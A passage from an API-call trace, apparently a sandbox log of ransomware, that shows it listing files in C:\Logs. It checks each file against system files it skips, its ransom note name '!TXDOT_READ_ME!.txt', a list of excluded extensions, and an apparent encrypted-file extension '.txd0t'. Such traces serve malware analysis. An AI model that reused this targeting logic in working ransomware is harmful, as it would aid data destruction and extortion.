ransomware ") returned 1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2=" ransom ") returned 1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="debug.txt") returned 1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="boot.ini") returned 1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="desktop.ini") returned 1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="autorun.inf") returned 1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="ntuser.dat") returned -1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="ntldr") returned -1 [0071.964] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="ntdetect.com") returned -1 [0071.964] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="bootfont.bin") returned 1 [0071.964] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.964] PathFindExtensionW (pszPath="Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned=".evtx" [0071.964] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.964] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.964] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.964] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.964] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.964] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.964] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.964] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b97f64, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b97f64, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", cAlternateFileName="MICC17~1.EVT")) returned 1 [0071.964] StrCmpW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2=".") returned 1 [0071.964] StrCmpW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="..") returned 1 [0071.964] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.964] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.964] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" [0071.964] PathFindExtensionW (pszPath="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned=".evtx" [0071.964] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.964] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.964] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.964] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.964] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.964] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2=" ransom ") returned 1 [0071.964] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="debug.txt") returned 1 [0071.964] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="boot.ini") returned 1 [0071.964] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.964] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.964] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.964] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="ntldr") returned -1 [0071.964] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.964] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.964] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.965] PathFindExtensionW (pszPath="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned=".evtx" [0071.965] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.965] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.965] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.965] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.965] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.965] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.965] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.965] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc986efe1, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc986efe1, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Wcmsvc%4Operational.evtx", cAlternateFileName="MI72BF~1.EVT")) returned 1 [0071.965] StrCmpW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2=".") returned 1 [0071.965] StrCmpW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="..") returned 1 [0071.965] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.965] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.965] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Wcmsvc%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" [0071.965] PathFindExtensionW (pszPath="Microsoft-Windows-Wcmsvc%4Operational.evtx") returned=".evtx" [0071.965] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.965] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.965] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.965] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.965] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.965] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2=" ransom ") returned 1 [0071.965] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="debug.txt") returned 1 [0071.965] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="boot.ini") returned 1 [0071.965] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.965] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.965] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.965] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="ntldr") returned -1 [0071.965] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.965] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.965] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.965] PathFindExtensionW (pszPath="Microsoft-Windows-Wcmsvc%4Operational.evtx") returned=".evtx" [0071.965] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.965] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.966] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.966] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.966] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.966] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.966] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.966] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb426548, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb426548, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Defender%4Operational.evtx", cAlternateFileName="MI7501~1.EVT")) returned 1 [0071.966] StrCmpW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2=".") returned 1 [0071.966] StrCmpW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="..") returned 1 [0071.966] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.966] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.966] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Windows Defender%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" [0071.966] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Defender%4Operational.evtx") returned=".evtx" [0071.966] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.966] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.966] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.966] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.966] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.966] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2=" ransom ") returned 1 [0071.966] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="debug.txt") returned 1 [0071.966] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="boot.ini") returned 1 [0071.966] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.966] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.966] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.966] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="ntldr") returned -1 [0071.966] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.966] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.966] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.966] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Defender%4Operational.evtx") returned=".evtx" [0071.966] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.966] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.966] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.966] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.966] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.967] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.967] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.967] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb4729e7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb4729e7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Defender%4WHC.evtx", cAlternateFileName="MIF226~1.EVT")) returned 1 [0071.967] StrCmpW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2=".") returned 1 [0071.967] StrCmpW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="..") returned 1 [0071.967] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.967] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.967] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Windows Defender%4WHC.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" [0071.967] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Defender%4WHC.evtx") returned=".evtx" [0071.967] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.967] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="bootsect.bak") returned 1 [0071.967] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="iconcache.db") returned 1 [0071.967] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="thumbs.db") returned -1 [0071.967] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2=" ransomware ") returned 1 [0071.967] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2=" ransom ") returned 1 [0071.967] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="debug.txt") returned 1 [0071.967] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="boot.ini") returned 1 [0071.967] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="desktop.ini") returned 1 [0071.967] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="autorun.inf") returned 1 [0071.967] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="ntuser.dat") returned -1 [0071.967] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="ntldr") returned -1 [0071.967] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="ntdetect.com") returned -1 [0071.967] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="bootfont.bin") returned 1 [0071.967] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.967] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Defender%4WHC.evtx") returned=".evtx" [0071.967] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.967] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.967] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.967] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.967] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.967] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.967] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.968] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4b19353, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4b19353, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", cAlternateFileName="MIDCC7~1.EVT")) returned 1 [0071.968] StrCmpW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2=".") returned 1 [0071.968] StrCmpW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="..") returned 1 [0071.968] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.968] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.968] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" [0071.968] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned=".evtx" [0071.968] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.968] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="bootsect.bak") returned 1 [0071.968] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="iconcache.db") returned 1 [0071.968] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="thumbs.db") returned -1 [0071.968] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2=" ransomware ") returned 1 [0071.968] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2=" ransom ") returned 1 [0071.968] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="debug.txt") returned 1 [0071.968] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="boot.ini") returned 1 [0071.968] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="desktop.ini") returned 1 [0071.968] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="autorun.inf") returned 1 [0071.968] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="ntuser.dat") returned -1 [0071.968] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="ntldr") returned -1 [0071.968] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="ntdetect.com") returned -1 [0071.968] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="bootfont.bin") returned 1 [0071.968] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.968] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned=".evtx" [0071.968] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.968] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.968] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.968] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.968] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.968] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.968] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.968] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c9b1b6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9c9b1b6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", cAlternateFileName="MI7771~1.EVT")) returned 1 [0071.969] StrCmpW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2=".") returned 1 [0071.969] StrCmpW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="..") returned 1 [0071.969] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.969] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.969] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" [0071.969] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned=".evtx" [0071.969] StrCmpW (psz1=".evtx", 